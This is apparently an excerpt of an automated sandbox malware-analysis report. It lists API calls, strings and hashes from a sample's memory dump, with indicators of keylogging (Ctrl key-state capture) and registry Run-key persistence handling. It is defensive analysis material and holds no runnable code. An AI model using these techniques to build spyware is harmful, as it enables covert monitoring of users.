                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: uD
                        • API String ID: 0-2547262877
                        • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                        • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                        Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                        • API String ID: 2086374402-949981407
                        • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                        • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                        Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: !D@$open
                        • API String ID: 587946157-1586967515
                        • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                        • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                        Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___initconout.LIBCMT ref: 0045555B
                          • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                        • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleCreateFileWrite___initconout
                        • String ID: PkGNG
                        • API String ID: 3087715906-263838557
                        • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                        • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                        • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                        • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                        Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                        • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                        Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • __Init_thread_footer.LIBCMT ref: 00410F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: ,kG$0kG
                        • API String ID: 1881088180-2015055088
                        • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                        • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                        Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                        • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 2654517830-1051519024
                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                        Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                        • GetLastError.KERNEL32 ref: 00440D35
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                        • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                        Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                        Download Yara Rule
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                        • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastRead
                        • String ID:
                        • API String ID: 4100373531-0
                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99